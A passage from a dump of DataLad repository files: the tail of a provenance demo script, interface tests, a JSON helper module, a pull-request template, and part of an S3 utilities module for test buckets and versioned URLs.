them in an art project later.\"\nsay \"We can use git-annex to obtain this image straight from the web\"\nrun \"git annex addurl https://upload.wikimedia.org/wikipedia/commons/a/a5/Flower_poster_2.jpg --file sources/flowers.jpg\"\n\nsay \"We save it in the dataset\"\nrun \"datalad save -m 'Added flower mosaic from wikimedia'\"\n\nsay \"Now we can use DataLad's 'run' command to process this image and extract one of the mosaic tiles into its own JPEG file. Let's extract the St. Bernard's Lily from the upper left corner.\"\nrun \"datalad run convert -extract 1522x1522+0+0 sources/flowers.jpg st-bernard.jpg\"\n\nsay \"All we have to do is prefix ANY command with 'datalad run'. DataLad will inspect the dataset after the command has finished and save all modifications.\"\nsay \"In order to reliably detect modifications, a dataset must not contain unsaved modifications prior to running a command. For example, if we try to extract the Scarlet Pimpernel image with unsaved changes...\"\nrun \"touch dirt\"\nrun_expfail \"datalad run convert -extract 1522x1522+1470+1470 sources/flowers.jpg pimpernel.jpg\"\n\nsay \"It has to be clean\"\nrun \"rm dirt\"\nrun \"datalad run convert -extract 1522x1522+1470+1470 sources/flowers.jpg pimpernel.jpg\"\n\nsay \"Every processing step is saved in the dataset, including the exact command and the content that was changed.\"\nrun \"git show --stat\"\n\nsay \"On top of that, the origin of any dataset content obtained from elsewhere is on record too\"\nrun \"git annex whereis sources/flowers.jpg\"\n\nsay \"Based on this information, we can always reconstruct how any data file came to be -- across the entire life-time of a project\"\nrun \"git log --oneline @~3..@\"\nrun \"datalad diff --revision @~3..@\"\n\nsay \"We can also rerun any previous commands with 'datalad rerun'. Without any arguments, the command from the last commit will be executed.\"\nrun \"datalad rerun\"\nrun \"git log --oneline --graph --name-only @~3..@\"\n\nsay \"In this case, a new commit isn't created because the output file didn't change. But let's say we add a step that displaces the Lily's pixels by a random amount.\"\nrun \"datalad run convert -spread 10 st-bernard.jpg st-bernard-displaced.jpg\"\n\nsay \"Now, if we rerun the previous command, a new commit is created because the output's content changed.\"\nrun \"datalad rerun\"\nrun \"git log --graph --oneline --name-only @~2..\"\n\nsay \"(We don't actually want the repeated 'spread' command, so let's reset to the parent commit.)\"\nrun \"git reset --hard @^\"\n\nsay \"We can also rerun multiple commits (with '--since') and choose where HEAD is when we start rerunning from (with --onto). When both arguments are set to empty strings, it means 'rerun all command with HEAD at the parent of the first commit a command'.\"\nsay \"In other words, you can 'replay' the commands.\"\nrun \"datalad rerun --since= --onto= --branch=verify\"\n\nsay \"Now we're on a new branch, 'verify', that contains the replayed history.\"\nrun \"git log --oneline --graph master verify\"\n\nsay \"Let's compare the two branches.\"\nrun \"datalad diff --revision master..verify\"\n\nsay \"We can see that the step that involved a random component produced different results.\"\nsay \"And these are just two branches, so you can compare them using normal Git operations. The next command, for example, marks which commits are 'patch-equivalent'.\"\n\nrun \"git log --oneline --left-right --cherry-mark master...verify\"\n\nsay \"Notice that all commits are marked as equivalent (=) except the 'random spread' ones.\"\n" }, { "alpha_fraction": 0.5783277153968811, "alphanum_fraction": 0.5891398191452026, "avg_line_length": 30.530303955078125, "blob_id": "3446c46ad16ce4127760af202ce936b52067d873", "content_id": "aaa58af41726286296a5614eba4ac75f289dfcc8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4162, "license_type": "permissive", "max_line_length": 101, "num_lines": 132, "path": "/datalad/tests/test_interface.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python-mode; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test command call wrapper\n\"\"\"\n\nimport re\n\nfrom datalad.interface.base import (\n Interface,\n get_api_name,\n)\nfrom datalad.support import constraints as cnstr\nfrom datalad.support.param import Parameter\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_in,\n assert_is,\n assert_raises,\n assert_re_in,\n assert_true,\n swallow_outputs,\n)\n\n\nclass Demo(Interface):\n \"\"\"I am a demo\"\"\"\n _params_ = dict(\n\n demoposarg=Parameter(\n doc=\"demoposdoc\",\n constraints=cnstr.EnsureInt(),\n nargs=2),\n\n demooptposarg1=Parameter(\n args=('demooptposarg1',),\n doc=\"demooptposdoc1\",\n constraints=cnstr.EnsureInt(),\n nargs='?'),\n\n demooptposarg2=Parameter(\n args=('demooptposarg2',),\n doc=\"demooptposdoc2\",\n constraints=cnstr.EnsureInt(),\n nargs='?'),\n\n demoarg=Parameter(\n doc=\"demodoc\",\n constraints=cnstr.EnsureInt()))\n\n def __call__(self, demoposarg, demooptposarg1=99, demooptposarg2=999, demoarg=100):\n return demoarg\n\n\ndef test_param():\n # having a parameter with no information is fine\n # it doesn't need a name, because it comes from the signature\n # of the actual implementation that is described\n p = Parameter()\n pname = 'testname'\n # minimal docstring\n assert_equal(pname, p.get_autodoc('testname'))\n doc = 'somedoc'\n p = Parameter(doc=doc)\n assert_equal('%s\\n %s.' % (pname, doc), p.get_autodoc('testname'))\n # constraints\n p = Parameter(doc=doc, constraints=cnstr.EnsureInt() | cnstr.EnsureStr())\n autodoc = p.get_autodoc('testname')\n assert_true('int or str' in autodoc)\n\n with assert_raises(ValueError) as cmr:\n Parameter(unknown_arg=123)\n assert_in('Detected unknown argument(s) for the Parameter: unknown_arg',\n str(cmr.value))\n\n\ndef test_interface():\n di = Demo()\n\n import argparse\n parser = argparse.ArgumentParser()\n\n from datalad.cli.parser import setup_parser_for_interface\n setup_parser_for_interface(parser, di)\n with swallow_outputs() as cmo:\n assert_equal(parser.print_help(), None)\n assert(cmo.out)\n assert_equal(cmo.err, '')\n args = parser.parse_args(['42', '11', '1', '2', '--demoarg', '23'])\n assert_is(args.demoarg, 23)\n assert_equal(args.demoposarg, [42, 11])\n assert_equal(args.demooptposarg1, 1)\n assert_equal(args.demooptposarg2, 2)\n\n # wrong type\n with swallow_outputs() as cmo:\n assert_raises(SystemExit, parser.parse_args, ['--demoarg', 'abc'])\n # that is what we dump upon folks atm. TODO: improve reporting of illspecified options\n assert_re_in(\".*invalid constraint:int value:.*\",\n cmo.err, re.DOTALL)\n\n # missing argument to option\n with swallow_outputs() as cmo:\n assert_raises(SystemExit, parser.parse_args, ['--demoarg'])\n assert_re_in(\".*--demoarg: expected one argument\", cmo.err, re.DOTALL)\n\n # missing positional argument\n with swallow_outputs() as cmo:\n assert_raises(SystemExit, parser.parse_args, [''])\n # PY2|PY3\n assert_re_in(\".*error: (too few arguments|the following arguments are required: demoposarg)\",\n cmo.err, re.DOTALL)\n\n\ndef test_name_generation():\n assert_equal(\n get_api_name((\"some.module\", \"SomeClass\")),\n 'module')\n assert_equal(\n get_api_name((\"some.module\", \"SomeClass\", \"cmdline-override\")),\n 'module')\n assert_equal(\n get_api_name((\"some.module\",\n \"SomeClass\",\n \"cmdline_override\",\n \"api_override-dont-touch\")),\n \"api_override-dont-touch\")\n" }, { "alpha_fraction": 0.580012857913971, "alphanum_fraction": 0.5838689208030701, "avg_line_length": 27.290908813476562, "blob_id": "5c6d4cfee42d6fddf67bfbb410071e691aa72d1a", "content_id": "16254166d7dd9bc971a1ee61f713f3583ff6dba2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6224, "license_type": "permissive", "max_line_length": 87, "num_lines": 220, "path": "/datalad/support/json_py.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Simple wrappers to get uniform JSON input and output\n\"\"\"\n\n\nimport io\nimport codecs\nfrom os.path import (\n dirname,\n exists,\n lexists,\n)\nfrom os import makedirs\nimport os\nimport os.path as op\nimport json\n\nfrom datalad.support.exceptions import CapturedException\n\n\n# produce relatively compact, but also diff-friendly format\njson_dump_kwargs = dict(\n indent=0,\n separators=(',', ':\\n'),\n sort_keys=True,\n ensure_ascii=False,)\n\n# achieve minimal representation, but still deterministic\ncompressed_json_dump_kwargs = dict(\n json_dump_kwargs,\n indent=None,\n separators=(',', ':'))\n\n\n# Let's just reuse top level one for now\nfrom ..log import lgr\n\n\ndef dump(obj, fname, compressed=False):\n \"\"\"Dump a JSON-serializable objects into a file\n\n Parameters\n ----------\n obj : object\n Structure to serialize.\n fname : str\n Name of the file to dump into.\n compressed : bool\n Flag whether to use LZMA compression for file content.\n \"\"\"\n\n _open = LZMAFile if compressed else io.open\n\n indir = dirname(fname)\n if not exists(indir):\n makedirs(indir)\n if lexists(fname):\n os.unlink(fname)\n with _open(fname, 'wb') as f:\n return dump2fileobj(\n obj,\n f,\n **(compressed_json_dump_kwargs if compressed else json_dump_kwargs)\n )\n\n\ndef dump2fileobj(obj, fileobj, **kwargs):\n \"\"\"Dump a JSON-serializable objects into a file-like\n\n Parameters\n ----------\n obj : object\n Structure to serialize.\n fileobj : file\n Writeable file-like object to dump into.\n **kwargs\n Keyword arguments to be passed on to simplejson.dump()\n \"\"\"\n return json.dump(\n obj,\n codecs.getwriter('utf-8')(fileobj),\n **kwargs)\n\n\ndef LZMAFile(*args, **kwargs):\n \"\"\"A little decorator to overcome a bug in lzma\n\n A unique to yoh and some others bug with pyliblzma\n calling dir() helps to avoid AttributeError __exit__\n see https://bugs.launchpad.net/pyliblzma/+bug/1219296\n \"\"\"\n import lzma\n lzmafile = lzma.LZMAFile(*args, **kwargs)\n dir(lzmafile)\n return lzmafile\n\n\ndef dump2stream(obj, fname, compressed=False):\n\n _open = LZMAFile if compressed else open\n\n indir = dirname(fname)\n\n if op.lexists(fname):\n os.remove(fname)\n elif indir and not exists(indir):\n makedirs(indir)\n with _open(fname, mode='wb') as f:\n jwriter = codecs.getwriter('utf-8')(f)\n for o in obj:\n json.dump(o, jwriter, **compressed_json_dump_kwargs)\n f.write(b'\\n')\n\n\ndef dump2xzstream(obj, fname):\n dump2stream(obj, fname, compressed=True)\n\n\ndef load_stream(fname, compressed=None):\n with _suitable_open(fname, compressed)(fname, mode='rb') as f:\n jreader = codecs.getreader('utf-8')(f)\n cont_line = u''\n for line in jreader:\n if not line.endswith('\\n'):\n cont_line += line\n continue\n if cont_line:\n cont_line += line\n else:\n cont_line = line\n yield loads(cont_line)\n cont_line = u''\n if cont_line: # The last line didn't end with a new line.\n yield loads(cont_line)\n\n\ndef loads(s, *args, **kwargs):\n \"\"\"Helper to log actual value which failed to be parsed\"\"\"\n try:\n return json.loads(s, *args, **kwargs)\n except:\n lgr.error(\n \"Failed to load content from %r with args=%r kwargs=%r\"\n % (s, args, kwargs)\n )\n raise\n\n\ndef load(fname, fixup=True, compressed=None, **kw):\n \"\"\"Load JSON from a file, possibly fixing it up if initial load attempt fails\n\n Parameters\n ----------\n fixup : bool\n In case of failed load, apply a set of fixups with hope to resolve issues\n in JSON\n compressed : bool or None\n Flag whether to treat the file as XZ compressed. If None, this decision\n is made automatically based on the presence of a '.xz' extension in the\n filename\n **kw\n Passed into the load (and loads after fixups) function\n \"\"\"\n with _suitable_open(fname, compressed)(fname, 'rb') as f:\n try:\n jreader = codecs.getreader('utf-8')(f)\n return json.load(jreader, **kw)\n except json.JSONDecodeError as exc:\n if not fixup:\n raise\n ce = CapturedException(exc)\n lgr.warning(\n \"Failed to decode content in %s: %s. Trying few tricks\",\n fname, ce)\n\n # Load entire content and replace common \"abusers\" which break JSON\n # comprehension but in general\n # are Ok\n with _suitable_open(fname)(fname,'rb') as f:\n s_orig = s = codecs.getreader('utf-8')(f).read()\n\n for o, r in {\n u\"\\xa0\": \" \", # non-breaking space\n }.items():\n s = s.replace(o, r)\n\n if s == s_orig:\n # we have done nothing, so just reraise previous exception\n raise\n return loads(s, **kw)\n\n\ndef _suitable_open(fname, compressed=None):\n \"\"\"Helper to return an appropriate open() implementation for a JSON file\n\n Parameters\n ----------\n fname: str\n The target file name which will be inspected for a '.xz' extension when\n compressed is None.\n compressed: None or bool, optional\n If not None, determined when the return function will be capable of\n (de)compression. If None, this will be guessed from the file name.\n\n Returns\n -------\n LZMAFile or io.open\n LZMAFile is returned when (de)compression is requested, or the file name\n suggests a compressed file.\n \"\"\"\n return LZMAFile \\\n if compressed or compressed is None and fname.endswith('.xz') \\\n else io.open\n" }, { "alpha_fraction": 0.7328159809112549, "alphanum_fraction": 0.7328159809112549, "avg_line_length": 74.16666412353516, "blob_id": "6f0a4ff5ccbb62991a0154ab0358b135b309d878", "content_id": "3bffa87936b573800dbabce14ace38eded49f0be", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": true, "language": "Markdown", "length_bytes": 902, "license_type": "permissive", "max_line_length": 141, "num_lines": 12, "path": "/.github/PULL_REQUEST_TEMPLATE.md", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "### PR checklist\n\n- [ ] Provide an overview of the changes you're making and explain why you're proposing them.\n- [ ] Create a changelog snippet (add the `CHANGELOG-missing` label to this pull request in order to have a snippet generated from its title;\n or use `scriv create` locally and include the generated file in the pull request, see [scriv](https://scriv.readthedocs.io/)).\n- [ ] Include `Fixes #NNN` somewhere in the description and `scriv` changelog entry if this PR addresses an existing issue.\n- [ ] If this PR is not complete, select \"Create Draft Pull Request\" in the pull request button's menu.\n Consider using a task list (e.g., `- [ ] add tests ...`) to indicate remaining to-do items.\n- [ ] If you would like to list yourself as a DataLad contributor and your name is not mentioned please modify .zenodo.json file.\n- [ ] **Delete these instructions**. :-)\n\nThanks for contributing!\n" }, { "alpha_fraction": 0.6020413041114807, "alphanum_fraction": 0.6111363768577576, "avg_line_length": 34.15275192260742, "blob_id": "a20fc7fa7dd0bb61b251745e90f94174dc1ec346", "content_id": "f0c00426ea4ae3a71dd51e54f82728f58735eb9f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19803, "license_type": "permissive", "max_line_length": 141, "num_lines": 563, "path": "/datalad/support/s3.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##g\n\"\"\"Variety of helpers to deal with AWS S3\n\nUse as a script to generate test buckets via e.g.\n\n python -m datalad.support.s3 generate test1_dirs\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport mimetypes\n\nfrom os.path import splitext\nimport re\n\nfrom datalad.support.network import urlquote, URL\n\nimport logging\nimport datalad.log # Just to have lgr setup happen this one used a script\nlgr = logging.getLogger('datalad.s3')\n\nfrom datalad.support.exceptions import (\n CapturedException,\n DownloadError,\n AccessDeniedError,\n AccessPermissionExpiredError,\n AnonymousAccessDeniedError,\n)\nfrom datalad.utils import try_multiple_dec\n\nfrom urllib.request import urlopen, Request\n\n\ntry:\n import boto\n from boto.s3.key import Key\n from boto.exception import S3ResponseError\n from boto.s3.connection import OrdinaryCallingFormat\nexcept Exception as e:\n if not isinstance(e, ImportError):\n lgr.warning(\n \"boto module failed to import although available: %s\",\n CapturedException(e))\n boto = Key = S3ResponseError = OrdinaryCallingFormat = None\n\n\n# TODO: should become a config option and managed along with the rest\nS3_ADMIN_CREDENTIAL = \"datalad-datalad-admin-s3\"\nS3_TEST_CREDENTIAL = \"datalad-datalad-test-s3\"\n\n\ndef _get_bucket_connection(credential):\n # eventually we should be able to have multiple credentials associated\n # with different resources. Thus for now just making an option which\n # one to use\n # do full shebang with entering credentials\n from datalad.downloaders.credentials import AWS_S3\n credential = AWS_S3(credential, None)\n if not credential.is_known:\n credential.enter_new()\n creds = credential()\n return boto.connect_s3(creds[\"key_id\"], creds[\"secret_id\"])\n\n\ndef _handle_exception(e, bucket_name):\n \"\"\"Helper to handle S3 connection exception\"\"\"\n raise (\n AccessDeniedError\n if e.error_code == 'AccessDenied'\n else DownloadError)(\n \"Cannot connect to %s S3 bucket.\"\n % (bucket_name)\n ) from e\n\n\ndef _check_S3ResponseError(e):\n \"\"\"Returns True if should be retried.\n\n raises ... if token has expired\"\"\"\n # https://docs.aws.amazon.com/AmazonS3/latest/API/ErrorResponses.html#ErrorCodeList\n if e.status in (\n 307, # MovedTemporarily -- DNS updates etc\n 503, # Slow down -- too many requests, so perfect fit to sleep a bit\n ):\n return True\n if e.status == 400:\n # Generic Bad Request -- could be many things! generally -- we retry, but\n # some times provide more directed reaction\n # ATM, as used, many requests we send with boto might be just HEAD requests\n # (if I got it right) and we would not receive BODY back with the detailed\n # error_code. Then we will allow to retry until we get something we know how to\n # handle it more specifically\n if e.error_code == 'ExpiredToken':\n raise AccessPermissionExpiredError(\n \"Used token to access S3 has expired\") from e\n elif not e.error_code:\n lgr.log(5, \"Empty error_code in %s\", e)\n return True\n return False\n\n\ndef try_multiple_dec_s3(func):\n \"\"\"An S3 specific adapter to @try_multiple_dec\n\n To decorate func to try multiple times after some sleep upon encountering\n some intermittent error from S3\n \"\"\"\n return try_multiple_dec(\n ntrials=4,\n duration=2.,\n increment_type='exponential',\n exceptions=S3ResponseError,\n exceptions_filter=_check_S3ResponseError,\n logger=lgr.debug,\n )(func)\n\n\ndef get_bucket(conn, bucket_name):\n \"\"\"A helper to get a bucket\n\n Parameters\n ----------\n bucket_name: str\n Name of the bucket to connect to\n \"\"\"\n try:\n return try_multiple_dec_s3(conn.get_bucket)(bucket_name)\n except S3ResponseError as e:\n ce = CapturedException(e)\n # can initially deny or error to connect to the specific bucket by name,\n # and we would need to list which buckets are available under following\n # credentials:\n lgr.debug(\"Cannot access bucket %s by name with validation: %s\",\n bucket_name, ce)\n if conn.anon:\n raise AnonymousAccessDeniedError(\n \"Access to the bucket %s did not succeed. Requesting \"\n \"'all buckets' for anonymous S3 connection makes \"\n \"little sense and thus not supported.\" % bucket_name,\n supported_types=['aws-s3']\n )\n\n if e.reason == \"Forbidden\":\n # Could be just HEAD call boto issues is not allowed, and we should not\n # try to verify that bucket is \"reachable\". Just carry on\n try:\n return try_multiple_dec_s3(conn.get_bucket)(bucket_name, validate=False)\n except S3ResponseError as e2:\n lgr.debug(\"Cannot access bucket %s even without validation: %s\",\n bucket_name, CapturedException(e2))\n _handle_exception(e, bucket_name)\n\n try:\n all_buckets = try_multiple_dec_s3(conn.get_all_buckets)()\n all_bucket_names = [b.name for b in all_buckets]\n lgr.debug(\"Found following buckets %s\", ', '.join(all_bucket_names))\n if bucket_name in all_bucket_names:\n return all_buckets[all_bucket_names.index(bucket_name)]\n except S3ResponseError as e2:\n lgr.debug(\"Cannot access all buckets: %s\", CapturedException(e2))\n _handle_exception(e, 'any (originally requested %s)' % bucket_name)\n else:\n _handle_exception(e, bucket_name)\n\n\nclass VersionedFilesPool(object):\n \"\"\"Just a helper which would help to create versioned files in the bucket\"\"\"\n def __init__(self, bucket):\n self._versions = {}\n self._bucket = bucket\n\n @property\n def bucket(self):\n return self._bucket\n\n def __call__(self, filename, prefix='', load=None):\n self._versions[filename] = version = self._versions.get(filename, 0) + 1\n version_str = \"version%d\" % version\n # if we are to upload fresh content\n k = Key(self._bucket)\n k.key = filename\n #k.set_contents_from_filename('/home/yoh/.emacs')\n base, ext = splitext(filename)\n #content_type = None\n mtype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'\n headers = {'Content-Type': mtype}\n\n if load is None:\n load = prefix\n if ext == 'html':\n load += '<html><body>%s</body></html>' % version_str\n else:\n load += version_str\n\n k.set_contents_from_string(load, headers=headers)\n return k\n\n def reset_version(self, filename):\n self._versions[filename] = 0\n\n\ndef get_key_url(e, schema='http', versioned=True):\n \"\"\"Generate an s3:// or http:// url given a key\n\n if versioned url is requested but version_id is None, no versionId suffix\n will be added\n \"\"\"\n # TODO: here we would need to encode the name since urlquote actually\n # can't do that on its own... but then we should get a copy of the thing\n # so we could still do the .format....\n # ... = e.name.encode('utf-8') # unicode isn't advised in URLs\n e.name_urlquoted = urlquote(e.name)\n if schema == 'http':\n fmt = \"http://{e.bucket.name}.s3.amazonaws.com/{e.name_urlquoted}\"\n elif schema == 's3':\n fmt = \"s3://{e.bucket.name}/{e.name_urlquoted}\"\n else:\n raise ValueError(schema)\n if versioned and e.version_id is not None:\n fmt += \"?versionId={e.version_id}\"\n return fmt.format(e=e)\n\n\ndef prune_and_delete_bucket(bucket):\n \"\"\"Deletes all the content and then deletes bucket\n\n Should be used with care -- no confirmation requested\n \"\"\"\n bucket.delete_keys(bucket.list_versions(''))\n # this one doesn't work since it generates DeleteMarkers instead ;)\n #for key in b.list_versions(''):\n # b.delete_key(key)\n bucket.delete()\n lgr.info(\"Bucket %s was removed\", bucket.name)\n\n\ndef set_bucket_public_access_policy(bucket):\n # we need to enable permissions for making content available\n bucket.set_policy(\"\"\"{\n \"Version\":\"2012-10-17\",\n \"Statement\":[{\n \"Sid\":\"AddPerm\",\n \"Effect\":\"Allow\",\n \"Principal\": \"*\",\n \"Action\":[\"s3:GetObject\", \"s3:GetObjectVersion\", \"s3:GetObjectTorrent\", \"s3:GetObjectVersionTorrent\"],\n \"Resource\":[\"arn:aws:s3:::%s/*\"]\n }\n ]\n }\"\"\" % bucket.name)\n\n\ndef gen_test_bucket(bucket_name):\n conn = _get_bucket_connection(S3_ADMIN_CREDENTIAL)\n # assure we have none\n try:\n bucket = conn.get_bucket(bucket_name)\n lgr.info(\"Deleting existing bucket %s\", bucket.name)\n prune_and_delete_bucket(bucket)\n except: # MIH: MemoryError?\n # so nothing to worry about\n pass\n finally:\n pass\n\n return conn.create_bucket(bucket_name)\n\n\ndef _gen_bucket_test0(bucket_name=\"datalad-test0\", versioned=True):\n\n bucket = gen_test_bucket(bucket_name)\n\n # Enable web access to that bucket to everyone\n bucket.configure_website('index.html')\n set_bucket_public_access_policy(bucket)\n\n files = VersionedFilesPool(bucket)\n\n files(\"1version-nonversioned1.txt\")\n files(\"2versions-nonversioned1.txt\")\n\n if versioned:\n # make bucket versioned AFTER we uploaded one file already\n bucket.configure_versioning(True)\n\n files(\"2versions-nonversioned1.txt\")\n files(\"2versions-nonversioned1.txt_sameprefix\")\n for v in range(3):\n files(\"3versions-allversioned.txt\")\n files(\"3versions-allversioned.txt_sameprefix\") # to test possible problems\n\n # File which was created and then removed\n bucket.delete_key(files(\"1version-removed.txt\"))\n\n # File which was created/removed/recreated (with new content)\n bucket.delete_key(files(\"2versions-removed-recreated.txt\"))\n files(\"2versions-removed-recreated.txt\")\n files(\"2versions-removed-recreated.txt_sameprefix\")\n\n # File which was created/removed/recreated (with new content)\n f = \"1version-removed-recreated.txt\"\n bucket.delete_key(files(f))\n files.reset_version(f)\n files(f)\n lgr.info(\"Bucket %s was generated and populated\", bucket_name)\n\n return bucket\n\n\ndef gen_bucket_test0_versioned():\n return _gen_bucket_test0('datalad-test0-versioned', versioned=True)\n\n\ndef gen_bucket_test0_nonversioned():\n return _gen_bucket_test0('datalad-test0-nonversioned', versioned=False)\n\n\ndef gen_bucket_test1_dirs():\n bucket_name = 'datalad-test1-dirs-versioned'\n bucket = gen_test_bucket(bucket_name)\n bucket.configure_versioning(True)\n\n # Enable web access to that bucket to everyone\n bucket.configure_website('index.html')\n set_bucket_public_access_policy(bucket)\n\n files = VersionedFilesPool(bucket)\n\n files(\"d1\", load=\"\") # creating an empty file\n # then we would like to remove that d1 as a file and make a directory out of it\n files(\"d1/file1.txt\")\n # and then delete it and place it back\n files(\"d1\", load=\"smth\")\n\n\ndef gen_bucket_test2_obscurenames_versioned():\n # in principle bucket name could also contain ., but boto doesn't digest it\n # well\n bucket_name = 'datalad-test2-obscurenames-versioned'\n bucket = gen_test_bucket(bucket_name)\n bucket.configure_versioning(True)\n\n # Enable web access to that bucket to everyone\n bucket.configure_website('index.html')\n set_bucket_public_access_policy(bucket)\n\n files = VersionedFilesPool(bucket)\n\n # http://docs.aws.amazon.com/AmazonS3/latest/dev/UsingMetadata.html\n files(\"f 1\", load=\"\")\n files(\"f [1][2]\")\n # Need to grow up for this .... TODO\n #files(u\"юникод\")\n #files(u\"юни/код\")\n # all fancy ones at once\n files(\"f!-_.*'( )\")\n # the super-fancy which aren't guaranteed to be good idea (as well as [] above)\n files(\"f &$=@:+,?;\")\n\n\ndef gen_bucket_test1_manydirs():\n # to test crawling with flexible subdatasets making decisions\n bucket_name = 'datalad-test1-manydirs-versioned'\n bucket = gen_test_bucket(bucket_name)\n bucket.configure_versioning(True)\n\n # Enable web access to that bucket to everyone\n bucket.configure_website('index.html')\n set_bucket_public_access_policy(bucket)\n\n files = VersionedFilesPool(bucket)\n\n files(\"d1\", load=\"\") # creating an empty file\n # then we would like to remove that d1 as a file and make a directory out of it\n files(\"d1/file1.txt\")\n files(\"d1/sd1/file1.txt\")\n files(\"d1/sd2/file3.txt\", load=\"a\")\n files(\"d1/sd2/ssd1/file4.txt\")\n files(\"d2/file1.txt\")\n files(\"d2/sd1/file1.txt\")\n files(\"d2/sd1/ssd/sssd/file1.txt\")\n\n\ndef add_version_to_url(url, version, replace=False):\n \"\"\"Add a version ID to `url`.\n\n Parameters\n ----------\n url : datalad.support.network.URL\n A URL.\n version : str\n The value of 'versionId='.\n replace : boolean, optional\n If a versionID is already present in `url`, replace it.\n\n Returns\n -------\n A versioned URL (str)\n \"\"\"\n version_id = \"versionId={}\".format(version)\n if not url.query:\n query = version_id\n else:\n ver_match = re.match(\"(?P<pre>.*&)?\"\n \"(?P<vers>versionId=[^&]+)\"\n \"(?P<post>&.*)?\",\n url.query)\n if ver_match:\n if replace:\n query = \"\".join([ver_match.group(\"pre\") or \"\",\n version_id,\n ver_match.group(\"post\") or \"\"])\n else:\n query = url.query\n else:\n query = url.query + \"&\" + version_id\n return URL(**dict(url.fields, query=query)).as_str()\n\n\ndef get_versioned_url(url, guarantee_versioned=False, return_all=False, verify=False,\n s3conn=None, update=False):\n \"\"\"Given a url return a versioned URL\n\n Originally targeting AWS S3 buckets with versioning enabled\n\n Parameters\n ----------\n url : string\n guarantee_versioned : bool, optional\n Would fail if buckets is determined to have no versioning enabled.\n It will not fail if we fail to determine if bucket is versioned or\n not\n return_all: bool, optional\n If True, would return a list with URLs for all the versions of this\n file, sorted chronologically with latest first (when possible, e.g.\n for S3). Remove markers get ignored\n verify: bool, optional\n Verify that URL is accessible. As discovered some versioned keys might\n be denied access to\n update : bool, optional\n If the URL already contains a version ID, update it to the latest version\n ID. This option has no effect if return_all is true.\n\n Returns\n -------\n string or list of string\n \"\"\"\n url_rec = URL(url)\n\n s3_bucket, fpath = None, url_rec.path.lstrip('/')\n\n was_versioned = False\n all_versions = []\n\n if url_rec.hostname.endswith('.s3.amazonaws.com'):\n if url_rec.scheme not in ('http', 'https'):\n raise ValueError(\"Do not know how to handle %s scheme\" % url_rec.scheme)\n # bucket name could have . in it, e.g. openneuro.org\n s3_bucket = url_rec.hostname[:-len('.s3.amazonaws.com')]\n elif url_rec.hostname == 's3.amazonaws.com':\n if url_rec.scheme not in ('http', 'https'):\n raise ValueError(\"Do not know how to handle %s scheme\" % url_rec.scheme)\n # url is s3.amazonaws.com/bucket/PATH\n s3_bucket, fpath = fpath.split('/', 1)\n elif url_rec.scheme == 's3':\n s3_bucket = url_rec.hostname # must be\n if url_rec.query and 'versionId=' in url_rec.query:\n was_versioned = True\n all_versions.append(url)\n else:\n # and for now implement magical conversion to URL\n # TODO: wouldn't work if needs special permissions etc\n # actually for now\n raise NotImplementedError\n\n if s3_bucket:\n # TODO: cache\n if s3conn is None:\n # we need to reuse our providers\n from ..downloaders.providers import Providers\n providers = Providers.from_config_files()\n s3url = \"s3://%s/\" % s3_bucket\n s3provider = providers.get_provider(s3url)\n authenticator = s3provider.authenticator\n if not authenticator:\n # We will use anonymous one\n from ..downloaders.s3 import S3Authenticator\n authenticator = S3Authenticator()\n if authenticator.bucket is not None and authenticator.bucket.name == s3_bucket:\n # we have established connection before, so let's just reuse\n bucket = authenticator.bucket\n else:\n bucket = authenticator.authenticate(s3_bucket, s3provider.credential) # s3conn or _get_bucket_connection(S3_TEST_CREDENTIAL)\n else:\n bucket = s3conn.get_bucket(s3_bucket)\n\n supports_versioning = True # assume that it does\n try:\n supports_versioning = bucket.get_versioning_status() # TODO cache\n except S3ResponseError as e:\n # might be forbidden, i.e. \"403 Forbidden\" so we try then anyways\n supports_versioning = 'maybe'\n\n if supports_versioning:\n all_keys = bucket.list_versions(fpath)\n # Filter and sort them so the newest one on top\n all_keys = [x for x in sorted(all_keys, key=lambda x: (x.last_modified, x.is_latest))\n if ((x.name == fpath) # match exact name, not just prefix\n )\n ][::-1]\n # our current assumptions\n assert(all_keys[0].is_latest)\n # and now filter out delete markers etc\n all_keys = [x for x in all_keys if isinstance(x, Key)] # ignore DeleteMarkers\n assert(all_keys)\n\n for key in all_keys:\n url_versioned = add_version_to_url(\n url_rec, key.version_id, replace=update and not return_all)\n\n all_versions.append(url_versioned)\n if verify:\n # it would throw HTTPError exception if not accessible\n _ = urlopen(Request(url_versioned))\n was_versioned = True\n if not return_all:\n break\n\n if guarantee_versioned and not was_versioned:\n raise RuntimeError(\"Could not version %s\" 